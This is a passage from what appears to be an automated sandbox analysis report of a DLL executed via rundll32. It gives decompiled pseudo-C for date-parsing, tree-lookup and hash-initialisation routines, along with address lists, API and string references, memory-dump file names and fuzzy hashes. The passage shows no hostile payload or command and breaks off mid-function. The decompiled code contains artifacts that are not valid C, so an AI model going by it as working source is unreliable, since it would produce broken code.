													if(__al != 0) {
														goto L90;
													} else {
														goto L100;
													}
													goto L97;
												}
											}
										} else {
											__eax = 0;
											__eflags = 0;
											do {
												__edx =  *(__esp + __eax + 0x68);
												 *(__esp + __eax + 0x8c) =  *(__esp + __eax + 0x68);
												__eax = __eax + 4;
												__eflags = __eax - 0x24;
											} while (__eax < 0x24);
											__eax = __esp[0x11];
											__esp[0x23] = __esp[0x11];
											__eax = __esp[0x12];
											__esp[0x24] = __esp[0x12];
											__eax = __esp[0x13];
											__esp[0x25] = __esp[0x13];
											__eax = 0;
											__eflags = 0;
											do {
												__edx =  *(__esp + __eax + 0x8c);
												 *(__esp + __eax + 0x44) =  *(__esp + __eax + 0x8c);
												__eax = __eax + 4;
												__eflags = __eax - 0x24;
											} while (__eax < 0x24);
											goto L50;
										}
									}
								}
							} else {
								__eax =  *__esi & 0x000000ff;
								__al = __al - 0x2b;
								__eflags = __al & 0x000000fd;
								if((__al & 0x000000fd) == 0) {
									__ebx =  &(__esp[0x23]);
									__edx = 0;
									__eax = 0;
									__eflags = 0;
									do {
										 *(__esp + __eax + 0x8c) = 0;
										 *((intOrPtr*)(__esp + __eax + 0x90)) = 0;
										__eax = __eax + 8;
										__eflags = __eax - 0x20;
									} while (__eax < 0x20);
									__ebx[__eax] = 0;
									__eax = 0;
									__edx = 0x100b4c28;
									__eflags =  *__esi - 0x2b;
									__eax = 0 |  *__esi != 0x0000002b;
									__esi =  &(__esi[1]);
									__eflags = __esi;
									__esp[6] = __eax;
									while(1) {
										__esp[2] = __ebx;
										__esp[1] = __edx;
										 *__esp = __esi;
										__eax = L1002EC70();
										__eflags = __eax;
										if(__eax != 0) {
											break;
										}
										__edi = __edi + 1;
										__eflags = __edi - 3;
										if(__edi == 3) {
											goto L63;
										} else {
											__edx =  *(0x100b4c64 + __edi * 4);
											continue;
										}
										goto L40;
									}
									__ecx = __esp[0x25];
									__esi = __eax;
									__eax = __esp[6];
									__edx = (__ecx << 4) - __ecx;
									__ecx = __esp[0x24];
									__edx = __esp[0x24] + __edx * 4;
									__edx = __edx * __esp[6];
									__edx = __edx << 4;
									__eax = (__edx << 4) - __edx;
									__eax = (__edx << 4) - __edx << 2;
									__esp[6] = __eax;
									__esp[7] = __eax;
									L51:
									__edx = __esp[0x15];
									__eax = 0;
									__esp[0x19] = 0;
									__ecx = __esp[0x16];
									__edi = __esp[0x14];
									__eax = __edx + 1;
									__eflags = __eax - 2;
									if(__eax <= 2) {
										__eax = __edx + 0xd;
										__ecx =  &(__ecx[0x76b]);
									} else {
										__ecx =  &(__ecx[0x76c]);
										__eflags = __ecx;
									}
									__eax = __eax + __eax * 8;
									__edx = __eax;
									__edx = __eax << 4;
									__ebx = __eax + (__eax << 4) - 0x1c9;
									__eax = 0x66666667;
									__edx = 0x66666667 * __ebx >> 0x20;
									0x66666667 * __ebx = __ebx;
									__eax = __ebx >> 0x1f;
									__edx = 0x66666667 * __ebx >> 0x20 >> 1;
									__edx = (0x66666667 * __ebx >> 0x20 >> 1) - (__ebx >> 0x1f);
									__eax = __ecx + __ecx * 8;
									__eax = __ecx + (__ecx + __ecx * 8) * 8;
									__ebx = __edx + __edi;
									__ebx =  &((__edx + __edi)[__eax]);
									__eflags = __ecx;
									 &(__ecx[3]) =  >=  ? __ecx :  &(__ecx[3]);
									__eax = ( >=  ? __ecx :  &(__ecx[3])) >> 2;
									__ebx =  &(__ebx[( >=  ? __ecx :  &(__ecx[3])) >> 2]);
									__eax = 0x51eb851f;
									__edx = 0x51eb851f * __ecx >> 0x20;
									__eax = 0x51eb851f * __ecx;
									__ecx = __ecx >> 0x1f;
									__edi = __ecx;
									__eax = __edx;
									__eax = __edx >> 5;
									__edx = __edx >> 7;
									__edi = __ecx - __eax;
									__edi =  &(__ebx[__ecx - __eax]);
									__ebx = __esp[0x12];
									__eax = __edi + __edx - 0xafa6d;
									__edx = 0x15180;
									__edi = __esp[0x13] * 0xe10;
									__edx = __eax * 0x15180 >> 0x20;
									__eax = __eax * 0x15180;
									__ecx = (__ebx << 4) - __ebx;
									__ecx = __esp[0x13] * 0xe10 + ((__ebx << 4) - __ebx) * 4;
									__edi = __esp[0x11];
									__ecx =  &((__esp[0x13] * 0xe10 + ((__ebx << 4) - __ebx) * 4)[__esp[0x11]]);
									__ebx = __ecx;
									__ebx = __ecx >> 0x1f;
									__ecx =  &(__ecx[__eax]);
									asm("adc ebx, edx");
									__ecx =  &(__ecx[__esp[6]]);
									asm("adc ebx, [esp+0x1c]");
									__esp[6] = __ecx;
									__esp[7] = __ebx;
									goto L29;
								} else {
									L28:
									 *__esp = __ebx;
									__ecx = 0xffffffff;
									__esp[0x19] = 0xffffffff;
									__imp___mktime64();
									__esp[6] = __eax;
									__esp[7] = __edx;
									L29:
									__eax =  *__esi & 0x000000ff;
									L30:
									_t239 = 0x842fa50a;
									_t220 = 0x7bd05af6;
									_t226 = 0xf4240;
									L31:
									if(_t204 != 0) {
										goto L63;
									} else {
										asm("sbb edx, eax");
										if(_t220 <  *(_t250 + 0x18)) {
											L76:
											_t205 = 0xffffffde;
										} else {
											_t210 =  *(_t250 + 0x18);
											_t232 =  *(_t250 + 0x1c);
											asm("sbb edi, esi");
											if(_t210 < _t239) {
												goto L76;
											} else {
												_t245 = _t248;
												_t242 = _t248 >> 0x1f;
												 *(_t250 + 0x1c) = _t210 * _t226 >> 0x20;
												 *(_t250 + 0x1c) =  *(_t250 + 0x1c) + _t232 * _t226;
												 *(_t250 + 0x18) = _t210 * _t226;
												asm("sbb edx, edi");
												asm("sbb eax, ebx");
												if(0xffffffff - _t248 <  *(_t250 + 0x18)) {
													goto L76;
												} else {
													L35:
													_t246 = _t245 +  *(_t250 + 0x18);
													asm("adc edi, [esp+0x1c]");
													if((_t246 | _t242 + 0x80000000) != 0 ||  *((char*)(_t250 + 0x2b)) == 0) {
														if( *((intOrPtr*)(_t250 + 0x24)) != 0) {
															_t246 =  ~_t246;
															asm("adc edi, 0x0");
															_t242 =  ~_t242;
														}
														goto L39;
													} else {
														goto L76;
													}
												}
											}
										}
									}
								}
								goto L40;
							}
						}
					} else {
						__esp[2] = __ebx;
						__ecx = "%H%M%S";
						__esp[1] = "%H%M%S";
						 *__esp = __ebp;
						__eax = L1002EC70();
						__eflags = __eax;
						__edx = __eax;
						if(__eax == 0) {
							L63:
							_t205 = 0xffffffea;
							L40:
							return _t205;
						} else {
							goto L14;
						}
					}
				}
			}

0x1002f208
0x1002f20d
0x1002f211
0x1002f213
0x1002f218
0x1002f21c
0x1002f21e
0x1002f220
0x1002f224
0x1002f227
0x1002f22c
0x1002f22f
0x1002f233
0x1002f238
0x1002f23c
0x1002f240
0x1002f245
0x1002f247
0x1002f4e4
0x1002f4e4
0x1002f4eb
0x1002f4ed
0x1002f4f0
0x00000000
0x1002f24d
0x1002f24d
0x1002f251
0x1002f256
0x1002f25a
0x1002f25d
0x1002f262
0x1002f264
0x1002f8bd
0x1002f8bf
0x1002f8c1
0x1002f26a
0x1002f26a
0x1002f26d
0x1002f272
0x1002f276
0x1002f27a
0x1002f27f
0x1002f282
0x1002f284
0x1002f287
0x1002f289
0x1002f28d
0x1002f28d
0x1002f290
0x1002f299
0x1002f29c
0x1002f6c8
0x00000000
0x1002f2b0
0x1002f2b5
0x1002f2b8
0x00000000
0x00000000
0x1002f2be
0x1002f2c0
0x00000000
0x00000000
0x00000000
0x1002f500
0x1002f500
0x1002f501
0x1002f501
0x1002f2b0
0x1002f2c6
0x1002f2c6
0x1002f2ca
0x1002f2cf
0x1002f2d3
0x1002f2d6
0x1002f2db
0x1002f2dd
0x1002f2df
0x1002f300
0x1002f300
0x1002f303
0x1002f305
0x1002f309
0x1002f30b
0x1002f8d1
0x1002f8d6
0x1002f326
0x1002f32a
0x1002f32c
0x1002f32f
0x1002f332
0x1002f88a
0x1002f88a
0x1002f88d
0x1002f338
0x1002f338
0x1002f33e
0x1002f342
0x1002f344
0x1002f347
0x1002f34a
0x1002f894
0x1002f894
0x1002f350
0x1002f356
0x1002f358
0x1002f35c
0x1002f35e
0x1002f361
0x1002f364
0x1002f89c
0x1002f89c
0x1002f36a
0x1002f370
0x1002f372
0x1002f376
0x1002f378
0x1002f37b
0x1002f37e
0x1002f8a4
0x1002f8a4
0x1002f384
0x1002f384
0x1002f387
0x1002f38e
0x1002f392
0x1002f394
0x1002f397
0x1002f39a
0x1002f8ac
0x1002f8ac
0x1002f3a0
0x1002f3a0
0x1002f3a3
0x1002f3a7
0x1002f3ab
0x1002f3ad
0x1002f3b0
0x1002f3b3
0x1002f8b5
0x1002f8b5
0x1002f3b9
0x1002f3b9
0x1002f3bb
0x1002f3bb
0x1002f3be
0x1002f3c2
0x1002f3c4
0x1002f3c7
0x1002f3ca
0x1002f3d0
0x1002f3d4
0x1002f3d5
0x1002f3d7
0x1002f3da
0x1002f3da
0x1002f3ca
0x1002f3b3
0x1002f39a
0x1002f37e
0x1002f364
0x1002f34a
0x1002f3df
0x1002f3e6
0x1002f3e8
0x1002f8ca
0x1002f1cd
0x1002f6f0
0x1002f6f4
0x00000000
0x1002f6f6
0x1002f6fb
0x1002f707
0x1002f70b
0x1002f710
0x1002f718
0x00000000
0x1002f71a
0x1002f1d3
0x1002f1d5
0x1002f6d0
0x1002f6d4
0x1002f868
0x1002f86c
0x00000000
0x1002f872
0x1002f872
0x1002f874
0x00000000
0x1002f874
0x00000000
0x00000000
0x00000000
0x1002f1db
0x1002f1e0
0x1002f1e6
0x1002f1e6
0x00000000
0x1002f1e0
0x1002f1d5
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f311
0x1002f311
0x1002f316
0x1002f3ee
0x1002f3ee
0x1002f3f0
0x1002f3f2
0x1002f3f5
0x1002f3f8
0x1002f3fc
0x1002f3ff
0x1002f3ff
0x1002f401
0x1002f510
0x1002f514
0x1002f516
0x1002f590
0x1002f590
0x1002f592
0x1002f596
0x1002f596
0x1002f598
0x00000000
0x1002f518
0x1002f518
0x1002f51a
0x1002f51e
0x1002f522
0x1002f526
0x1002f529
0x1002f7c8
0x1002f7ce
0x1002f7d0
0x00000000
0x1002f7d6
0x1002f7d6
0x1002f7d6
0x1002f7d8
0x1002f7d8
0x1002f7dc
0x1002f7e3
0x1002f7e6
0x1002f7e6
0x1002f7eb
0x1002f7ef
0x1002f7f6
0x1002f7fa
0x1002f801
0x1002f805
0x1002f80c
0x1002f80c
0x1002f80e
0x1002f80e
0x1002f815
0x1002f819
0x1002f81c
0x1002f81c
0x00000000
0x1002f821
0x1002f52f
0x1002f52f
0x1002f535
0x1002f537
0x1002f8dd
0x1002f8dd
0x1002f8df
0x1002f8e4
0x1002f8eb
0x1002f8eb
0x1002f8eb
0x1002f8eb
0x1002f8ed
0x1002f8f0
0x1002f8f1
0x1002f8f2
0x1002f8f3
0x1002f8f4
0x1002f8fa
0x1002f901
0x1002f908
0x1002f90b
0x1002f90d
0x1002f90f
0x1002f913
0x1002f913
0x1002f913
0x1002f914
0x1002f91b
0x1002f91f
0x1002f920
0x1002f922
0x1002f926
0x1002f92d
0x1002f9a0
0x1002f9a0
0x1002f9a2
0x1002f9a4
0x1002f9a7
0x1002f9a9
0x1002f9ab
0x00000000
0x00000000
0x1002f930
0x1002f930
0x1002f930
0x1002f932
0x1002f934
0x00000000
0x1002f940
0x1002f940
0x1002f940
0x1002f942
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f948
0x1002f948
0x1002f94a
0x1002f94c
0x1002f94f
0x00000000
0x00000000
0x1002fa10
0x1002fa14
0x1002fa15
0x1002fa17
0x1002f969
0x1002f969
0x1002f96c
0x1002f96e
0x1002f970
0x1002f972
0x1002f9b0
0x1002f9b0
0x1002f9b3
0x1002f9b7
0x1002f9b9
0x1002fa8d
0x1002fa8d
0x1002fa8f
0x1002f9bf
0x1002f9bf
0x1002f9c2
0x00000000
0x1002f9c8
0x1002f9c8
0x1002f9cf
0x1002f9cf
0x1002f9d5
0x1002f9d7
0x1002f9d9
0x00000000
0x00000000
0x1002fa40
0x1002fa43
0x1002fa45
0x1002fa45
0x1002fa47
0x1002fa49
0x1002fa4c
0x1002fa4d
0x1002fa50
0x1002fa52
0x1002fa7d
0x1002fa7d
0x1002fa7f
0x1002fa86
0x1002fa54
0x1002fa54
0x1002fa57
0x00000000
0x1002fa59
0x1002fa59
0x00000000
0x1002fa59
0x1002fa57
0x00000000
0x1002fa52
0x1002f9db
0x1002f9de
0x1002f9e2
0x1002f9e9
0x1002f9eb
0x1002f9ed
0x1002f9ef
0x1002fa00
0x1002fa00
0x1002fa04
0x1002fa05
0x1002fa07
0x00000000
0x00000000
0x1002f9f8
0x1002f9fa
0x00000000
0x00000000
0x00000000
0x1002f9fa
0x00000000
0x1002f9f1
0x1002f9ef
0x1002f9eb
0x1002f9c2
0x1002f9b9
0x1002fa1d
0x1002fa1d
0x1002fa20
0x00000000
0x1002fa26
0x1002fa26
0x1002fa28
0x00000000
0x00000000
0x00000000
0x00000000
0x1002fa28
0x1002fa20
0x00000000
0x1002fa17
0x1002f955
0x1002f957
0x1002f95b
0x1002f95c
0x1002f95f
0x1002f961
0x1002f963
0x00000000
0x1002f965
0x1002f965
0x1002f967
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f967
0x00000000
0x1002f963
0x1002fa2e
0x1002fa2e
0x1002fa31
0x1002fa33
0x1002fa33
0x1002f934
0x1002f974
0x1002f974
0x1002f97e
0x1002f983
0x1002f985
0x1002fa60
0x1002fa66
0x1002fa6b
0x1002fa6c
0x1002fa6d
0x1002fa6e
0x1002fa6f
0x1002f98b
0x1002f98b
0x1002f98f
0x1002fa70
0x1002fa76
0x1002fa76
0x1002fa78
0x1002fa79
0x1002fa7a
0x1002fa7b
0x1002fa7c
0x1002f995
0x1002f995
0x1002f999
0x1002f99c
0x1002f99e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f99e
0x1002f98f
0x1002f53d
0x1002f53d
0x1002f53d
0x1002f53f
0x1002f53f
0x1002f543
0x1002f54a
0x1002f54d
0x1002f54d
0x1002f552
0x1002f556
0x1002f55d
0x1002f561
0x1002f568
0x1002f56c
0x1002f573
0x1002f573
0x1002f575
0x1002f575
0x1002f57c
0x1002f580
0x1002f583
0x1002f583
0x00000000
0x1002f575
0x1002f537
0x1002f529
0x1002f407
0x1002f407
0x1002f40a
0x1002f40c
0x1002f40e
0x1002f660
0x1002f667
0x1002f669
0x1002f669
0x1002f66b
0x1002f66b
0x1002f672
0x1002f679
0x1002f67c
0x1002f67c
0x1002f681
0x1002f688
0x1002f68a
0x1002f68f
0x1002f692
0x1002f695
0x1002f695
0x1002f69a
0x1002f69e
0x1002f69e
0x1002f6a2
0x1002f6a6
0x1002f6a9
0x1002f6ae
0x1002f6b0
0x00000000
0x00000000
0x1002f6b6
0x1002f6b7
0x1002f6ba
0x00000000
0x1002f6bc
0x1002f6bc
0x00000000
0x1002f6bc
0x00000000
0x1002f6ba
0x1002f826
0x1002f82d
0x1002f82f
0x1002f838
0x1002f83a
0x1002f841
0x1002f844
0x1002f849
0x1002f84c
0x1002f84e
0x1002f851
0x1002f858
0x1002f59c
0x1002f59c
0x1002f5a0
0x1002f5a2
0x1002f5a6
0x1002f5aa
0x1002f5ae
0x1002f5b1
0x1002f5b4
0x1002f728
0x1002f72b
0x1002f5ba
0x1002f5ba
0x1002f5ba
0x1002f5ba
0x1002f5c0
0x1002f5c3
0x1002f5c5
0x1002f5c8
0x1002f5cf
0x1002f5d4
0x1002f5d6
0x1002f5d8
0x1002f5db
0x1002f5dd
0x1002f5df
0x1002f5e2
0x1002f5e5
0x1002f5eb
0x1002f5ed
0x1002f5f2
0x1002f5f5
0x1002f5f8
0x1002f5fa
0x1002f5ff
0x1002f5ff
0x1002f601
0x1002f604
0x1002f606
0x1002f608
0x1002f60b
0x1002f60e
0x1002f610
0x1002f612
0x1002f618
0x1002f61f
0x1002f624
0x1002f62c
0x1002f62c
0x1002f633
0x1002f635
0x1002f638
0x1002f63c
0x1002f63e
0x1002f640
0x1002f643
0x1002f645
0x1002f647
0x1002f64b
0x1002f64f
0x1002f653
0x00000000
0x1002f414
0x1002f414
0x1002f414
0x1002f417
0x1002f41c
0x1002f420
0x1002f426
0x1002f42a
0x1002f42e
0x1002f42e
0x1002f431
0x1002f431
0x1002f43b
0x1002f445
0x1002f44a
0x1002f44c
0x00000000
0x1002f452
0x1002f45c
0x1002f45e
0x1002f880
0x1002f880
0x1002f464
0x1002f464
0x1002f468
0x1002f470
0x1002f472
0x00000000
0x1002f478
0x1002f47e
0x1002f483
0x1002f486
0x1002f48f
0x1002f493
0x1002f4a6
0x1002f4ac
0x1002f4ae
0x00000000
0x1002f4b4
0x1002f4b4
0x1002f4b4
0x1002f4b8
0x1002f4c8
0x1002f4db
0x1002f4dd
0x1002f4df
0x1002f4e2
0x1002f4e2
0x00000000
0x00000000
0x00000000
0x00000000
0x1002f4c8
0x1002f4ae
0x1002f472
0x1002f45e
0x1002f44c
0x00000000
0x1002f40e
0x1002f401
0x1002f2e1
0x1002f2e1
0x1002f2e5
0x1002f2ea
0x1002f2ee
0x1002f2f1
0x1002f2f6
0x1002f2f8
0x1002f2fa
0x1002f6e0
0x1002f6e0
0x1002f4f2
0x1002f4fc
0x00000000
0x00000000
0x00000000
0x1002f2fa
0x1002f2df

APIs

mv_gettime.MAIN ref: 1002F208
mv_strcasecmp.MAIN ref: 1002F240
mv_small_strptime.MAIN ref: 1002F25D
mv_small_strptime.MAIN ref: 1002F27A
mv_small_strptime.MAIN ref: 1002F2D6
mv_small_strptime.MAIN ref: 1002F2F1
_mktime64.MSVCRT ref: 1002F420

Strings

%H:%M:%S, xrefs: 1002F2CA
%Y - %m - %d, xrefs: 1002F251
%H%M%S, xrefs: 1002F2E5
now, xrefs: 1002F233
%Y%m%d, xrefs: 1002F26D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_small_strptime$_mktime64mv_gettimemv_strcasecmp
String ID: %H%M%S$%H:%M:%S$%Y - %m - %d$%Y%m%d$now
API String ID: 3102546153-2275413634
Opcode ID: 3b59df7daf9013c20f7f9f6ddd4171326e91ec71721b8f1468b8232903dcc860
Instruction ID: 7f3ee14ce240381be5dd98d6c3d180aec0b6e0ebcf4911cbbe250e8a450d1d0f
Opcode Fuzzy Hash: 3b59df7daf9013c20f7f9f6ddd4171326e91ec71721b8f1468b8232903dcc860
Instruction Fuzzy Hash: F1518F75A083564FC344DF29948032AFBE1EFC8794F92893EE5D8C7391EA34D9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 1004C82C Relevance: 19.8, APIs: 13, Instructions: 294COMMON

Download Yara Rule

APIs

mv_tree_find.MAIN ref: 1004C8CF
mv_tree_find.MAIN ref: 1004C8EE
mv_tree_find.MAIN ref: 1004C958
mv_tree_find.MAIN ref: 1004C973
mv_tree_find.MAIN ref: 1004CA6F
mv_tree_find.MAIN ref: 1004CA8E
mv_tree_find.MAIN ref: 1004CAF8
mv_tree_find.MAIN ref: 1004CB13

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_tree_find
String ID:
API String ID: 59044961-0
Opcode ID: 95cf165c7df1e3b14e8353417eaf65eff3f766b1f1fabdb0d3657f97e4e1532e
Instruction ID: 92974a57f51364e3157bc9e69e38102b8c966e1fd57831e9c9b5ac2784e8d0df
Opcode Fuzzy Hash: 95cf165c7df1e3b14e8353417eaf65eff3f766b1f1fabdb0d3657f97e4e1532e
Instruction Fuzzy Hash: 1FC1C2B490974A9FC340DF6AC18081AFBE5FFC8654F61892EE898D7311E774E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1004C877 Relevance: 19.8, APIs: 13, Instructions: 279COMMON

Download Yara Rule

APIs

mv_tree_find.MAIN ref: 1004C8CF
mv_tree_find.MAIN ref: 1004C8EE
mv_tree_find.MAIN ref: 1004C958
mv_tree_find.MAIN ref: 1004C973
mv_tree_find.MAIN ref: 1004CA6F
mv_tree_find.MAIN ref: 1004CA8E

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_tree_find
String ID:
API String ID: 59044961-0
Opcode ID: 5ba1de0a2128bb80714fc7f87f514a6120d16dbb4c6ec235376ab0e5548afddf
Instruction ID: 55863b4f0a31e834c219965d94d4823f7879c6ff1bed93916ad31882f3d71024
Opcode Fuzzy Hash: 5ba1de0a2128bb80714fc7f87f514a6120d16dbb4c6ec235376ab0e5548afddf
Instruction Fuzzy Hash: 8AC1D2B4909749AFC340DF6AC18091AFBE5FF88654F61892EE8D8D7311E734E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1001C870 Relevance: 19.7, APIs: 13, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E1001C870(void* __ebx, void* __edi) {
				intOrPtr _t1167;
				void* _t1171;

				_t1167 =  *((intOrPtr*)(_t1171 - 0x1c + 0x20));
				if( *(_t1167 + 4) > 0xe) {
					L3:
					return _t1167;
				} else {
					switch( *((intOrPtr*)( *(_t1167 + 4) * 4 +  &M100B2E44))) {
						case 0:
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							__eax = __esp[1];
							 *__eax = 0;
							 *(__eax + 4) = 0;
							 *((intOrPtr*)(__eax + 0x48)) = 0x10325476;
							 *((intOrPtr*)(__eax + 0x4c)) = 0x98badcfe;
							 *((intOrPtr*)(__eax + 0x50)) = 0xefcdab89;
							 *((intOrPtr*)(__eax + 0x54)) = 0x67452301;
							return __eax;
							goto L440;
						case 1:
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							__esp = __esp - 0xc;
							__esp[1] = __esi;
							__ecx = __esp[4];
							__esi = 0;
							 *__esp = __ebx;
							__ebx = 0x20;
							__esp[2] = __edi;
							__eax = 0x10 + __ecx;
							if((__cl & 0x00000001) != 0) {
								 *(0x10 + __ecx) = 0;
								__eax = __ecx + 0x11;
								__ebx = 0x1f;
							}
							if((__al & 0x00000002) != 0) {
								 *__eax = 0;
								__ebx = __ebx - 2;
								__eax = __eax + 2;
							}
							__edi = __ebx;
							__edx = 0;
							__edi = __ebx & 0xfffffff8;
							do {
								 *(__eax + __edx) = __esi;
								 *(__eax + __edx + 4) = __esi;
								__edx = 8 + __edx;
							} while (__edx < __edi);
							__eax = __eax + __edx;
							if((__bl & 0x00000004) != 0) {
								 *__eax = 0;
								__eax = __eax + 4;
								if((__bl & 0x00000002) == 0) {
									goto L128;
								} else {
									goto L131;
								}
							} else {
								if((__bl & 0x00000002) != 0) {
									L131:
									 *__eax = 0;
									__eax = __eax + 2;
									if((__bl & 0x00000001) != 0) {
										goto L130;
									}
								} else {
									L128:
									if((__bl & 0x00000001) != 0) {
										L130:
										 *__eax = 0;
									}
								}
							}
							__ebx =  *__esp;
							 *(8 + __ecx) = 0xdaddca55;
							__esi = __esp[1];
							 *(__ecx + 0xc) = 0x725acc55;
							__edi = __esp[2];
							 *__ecx = 0xdaddca55;
							 *(__ecx + 4) = 0x725acc55;
							__esp =  &(__esp[3]);
							return __eax;
							goto L440;
						case 2:
							__edx = 0x80;
							__esp[1] = 0x80;
							 *__esp = __eax;
							__eax = E100A5198();
							goto L3;
						case 3:
							__ecx = 0xa0;
							__esp[1] = 0xa0;
							 *__esp = __eax;
							__eax = E100A5198();
							goto L3;
						case 4:
							__edx = 0x100;
							__esp[1] = 0x100;
							 *__esp = __eax;
							__eax = E100A5198();
							goto L3;
						case 5:
							__ecx = 0x140;
							__esp[1] = 0x140;
							 *__esp = __eax;
							__eax = E100A5198();
							goto L3;
						case 6:
							__edx = 0xa0;
							__esp[1] = 0xa0;
							 *__esp = __eax;
							__eax = E100A52C0();
							goto L3;
						case 7:
							__ecx = 0xe0;
							__esp[1] = 0xe0;
							 *__esp = __eax;
							__eax = E100A52C0();
							goto L3;
						case 8:
							__edx = 0x100;
							__esp[1] = 0x100;
							 *__esp = __eax;
							__eax = E100A52C0();
							goto L3;
						case 9:
							__ecx = 0xe0;
							__esp[1] = 0xe0;
							 *__esp = __eax;
							__eax = E100A53BC();
							goto L3;
						case 0xa:
							__edx = 0x100;
							__esp[1] = 0x100;
							 *__esp = __eax;
							__eax = E100A53BC();
							goto L3;
						case 0xb:
							__ecx = 0x180;
							__esp[1] = 0x180;
							 *__esp = __eax;
							__eax = E100A53BC();
							goto L3;
						case 0xc:
							__edx = 0x200;
							__esp[1] = 0x200;
							 *__esp = __eax;
							__eax = E100A53BC();
							goto L3;
						case 0xd:
							 *(__eax + 0xc) = 0xffffffff;
							goto L3;
						case 0xe:
							 *(_t1167 + 0xc) = 1;
							goto L3;
						case 0xf:
							__esp[0xa] = __ecx;
							__esp[9] = __edx;
							__eax =  *__ebx;
							__ebx = __esp[6];
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							__esp = __esp - 0x24;
							__esp[5] = __ebx;
							__ebx = __esp[0xa];
							__esp[8] = __ebp;
							__ebp = __esp[0xc];
							__esp[6] = __esi;
							__esp[7] = __edi;
							__edi = 0;
							__eax =  *__ebx;
							__edx =  *(__ebx + 4);
							__ebp = __eax + __ebp;
							 *__ebx = __eax + __ebp;
							asm("adc edi, edx");
							__eax = __eax & 0x0000003f;
							 *(__ebx + 4) = 0;
							 *__esp = __eax;
							if(__eax != 0) {
								__edx = 0x40;
								__edi = __eax;
								__esi = __esp[0xb];
								__edi = __ebx + __eax + 8;
								__edx = 0x40 - __eax;
								__eax = 8 + __ebx;
								__esp[2] = 8 + __ebx;
								__edx =  >  ? __ebp : __edx;
								__esp[1] = 0x40;
								if(0x40 >= 4) {
									if((__edi & 0x00000001) != 0) {
										__eax =  *__esi & 0x000000ff;
										__edi = __edi + 1;
										 *(__edi - 1) = __al;
										__eax = __esp[0xb];
										__esi = __esp[0xb] + 1;
										__eax = 0x3f;
										__esp[1] = 0x3f;
									}
									if((__edi & 0x00000002) != 0) {
										__eax =  *__esi & 0x0000ffff;
										__edi = __edi + 2;
										__esi = __esi + 2;
										 *(__edi - 2) = __ax;
										__esp[1] = __esp[1] - 2;
									}
									__eax = __esp[1];
									if(__eax >= 4) {
										__esp[3] = __edx;
										__eax = __eax & 0xfffffffc;
										__ecx = 0;
										__edx = __eax;
										do {
											__eax =  *(__esi + __ecx);
											 *(__edi + __ecx) =  *(__esi + __ecx);
											__ecx = __ecx + 4;
										} while (__ecx < __edx);
										__edx = __esp[3];
										__edi = __edi + __ecx;
										__esi = __esi + __ecx;
									}
								}
								__ecx = 0;
								if((__esp[1] & 0x00000002) != 0) {
									__eax =  *__esi & 0x0000ffff;
									__ecx = 2;
									 *__edi = __ax;
								}
								if((__esp[1] & 0x00000001) != 0) {
									__eax =  *(__esi + __ecx) & 0x000000ff;
									 *(__edi + __ecx) = __al;
								}
								__eax =  *__esp;
								__eax =  *__esp + __edx;
								if(__eax > 0x3f) {
